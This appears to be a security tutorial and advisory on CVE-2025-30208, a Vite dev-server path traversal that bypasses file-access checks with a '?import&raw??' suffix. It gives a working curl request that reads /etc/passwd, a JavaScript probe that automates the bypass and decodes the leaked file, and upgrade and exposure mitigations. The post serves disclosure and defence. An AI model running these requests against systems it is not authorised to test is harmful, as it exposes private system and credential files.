CVE-2025-30208 – Vite Arbitrary File Read via @fs Path Traversal Bypass

Research & Tutorials

Jul 31, 2025


CVE-2025-30208 is an arbitrary file read vulnerability in the Vite development server. Learn how an attacker who can reach the dev server abuses its @fs URL handling to read files outside the project.

OffSec Team

Overview

CVE-2025-30208 is an arbitrary file read vulnerability in the Vite development server. An unauthenticated attacker who can reach the dev server over the network can read any file the Vite process can read, including files outside the project and files covered by server.fs.deny, by abusing Vite's /@fs/ URL handling.

  • CVE ID: CVE-2025-30208
  • Severity: Medium
  • CVSS Score: 5.3
  • EPSS Score: 75.83%
  • Impact: Information Disclosure
  • Attack Vector: Network
  • Authentication Required: No
  • Vulnerable Component: @fs path handler in the Vite Dev Server

Only applications running the Vite dev server are affected; a production build does not ship the dev server. Vite binds to localhost by default, so a dev server is reachable remotely only when it has been started with --host or server.host set, which is exactly the configuration that exposes sensitive server-side files here.


Technical Breakdown

Vite supports special paths like /@fs/absolute/path to import files directly from the filesystem during development. Normally, Vite refuses /@fs/ requests for files outside server.fs.allow (by default the workspace root) and for files matching server.fs.deny (by default .env files, certificates and .git contents).

However, by appending ?raw?? or ?import&raw?? to the request, an attacker can bypass this protection and force Vite to read and return the file's contents as the default export of a raw ES module. The root cause, as described in the upstream advisory, is that trailing separators such as ? are stripped in several places in Vite, but the regular expressions that match query strings do not account for them, so the access check and the loader disagree about what the URL is.


Conditions for Exploitation

  • The target is running the Vite dev server (port 5173 by default) in an affected version.
  • The dev server is reachable from the attacker's network position, i.e., it was started with --host or server.host set so that it listens beyond localhost.
  • The attacker can issue crafted HTTP GET requests to the dev server.
  • The target file is readable by the user running the Vite process.

Vulnerable Code Behavior

Expected behavior:

$ curl "http://localhost:5173/@fs/etc/passwd"
# => 403 Restricted

Security bypass (vulnerable):

$ curl "http://localhost:5173/@fs/etc/passwd?import&raw??"

# Response
export default "root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n";
//# sourceMappingURL=data:application/json;base64,...

The trailing double question marks (??) are the whole trick. Vite strips trailing ? and & separators in several places before serving a file, but the regular expression that decides whether a URL is a ?raw request, and therefore whether the allow-list check has to run, requires raw to be followed by & or the end of the URL. With ?raw?? that check is skipped, while the raw loader further down still recognises the request and reads the file. The server responds with the file content wrapped in an ES module as export default, exactly as it would for a legitimate ?raw import of a project file.
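The following added check script (written for this page, not part of the original post) turns the two curl requests above into a repeatable test. decodeRawModule and classify run offline against a constructed pair of responses mirroring the curl output; probe and httpFetchText are the network wrapper for a live target and assume Node 18 or later, where fetch is global.

```javascript
'use strict';

// Decode the body of a ?raw response. Vite wraps the file as an ES module whose
// first line is `export default <JSON string>;`, optionally followed by a
// //# sourceMappingURL comment on the next line.
function decodeRawModule(body) {
  const firstLine = String(body).split('\n', 1)[0].trim();
  const prefix = 'export default ';
  if (!firstLine.startsWith(prefix)) return null;
  let literal = firstLine.slice(prefix.length);
  if (literal.endsWith(';')) literal = literal.slice(0, -1);
  if (!literal.startsWith('"')) return null;
  try {
    return JSON.parse(literal);
  } catch {
    return null;
  }
}

// Turn the baseline (/@fs/<file>) and bypass (?import&raw??) responses into a
// verdict. Each response is { status, body }.
function classify(baseline, bypass) {
  if (baseline.status === 200) {
    // The file is inside the allow list, so a bypass response proves nothing.
    return { verdict: 'file-already-allowed', content: null };
  }
  if (baseline.status !== 403) {
    return { verdict: 'inconclusive', content: null };
  }
  const content = bypass.status === 200 ? decodeRawModule(bypass.body) : null;
  return content === null
    ? { verdict: 'patched-or-blocked', content: null }
    : { verdict: 'vulnerable', content };
}

// Issue both requests against a live dev server. fetchText(url) must resolve
// to { status, body }; httpFetchText below is the real transport.
async function probe(baseUrl, file, fetchText) {
  const target = `${baseUrl}/@fs${file}`;
  const baseline = await fetchText(target);
  const bypass = await fetchText(`${target}?import&raw??`);
  return classify(baseline, bypass);
}

async function httpFetchText(url) {
  const res = await fetch(url);
  return { status: res.status, body: await res.text() };
}

// Constructed responses mirroring the curl output above, for an offline run.
const SAMPLE_BASELINE = { status: 403, body: 'Restricted' };
const SAMPLE_BYPASS = {
  status: 200,
  body:
    'export default "root:x:0:0:root:/root:/bin/bash\\n";\n' +
    '//# sourceMappingURL=data:application/json;base64,e30=',
};

console.log(classify(SAMPLE_BASELINE, SAMPLE_BYPASS));
// Live use: probe('http://localhost:5173', '/etc/passwd', httpFetchText).then(console.log);
```

Pick a file that is outside the project root but readable by the dev-server user so that the baseline request is refused; a baseline 200 means the file was inside server.fs.allow and says nothing about the bypass.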


Mitigation

  • Never expose Vite's dev server to the public internet. Leave server.host at its localhost default and do not start the server with --host unless you need it; the dev server has no authentication of its own.
  • Upgrade Vite to a fixed release: 6.2.3, 6.1.2, 6.0.12, 5.4.15 or 4.5.10, or any later version in the same line.
  • Do not treat server.fs.deny as a substitute for the upgrade; it is precisely the control this bypass defeats.
  • If remote access is genuinely required, put the dev server behind a proxy that authenticates clients, or restrict it with firewall rules to the addresses that need it.
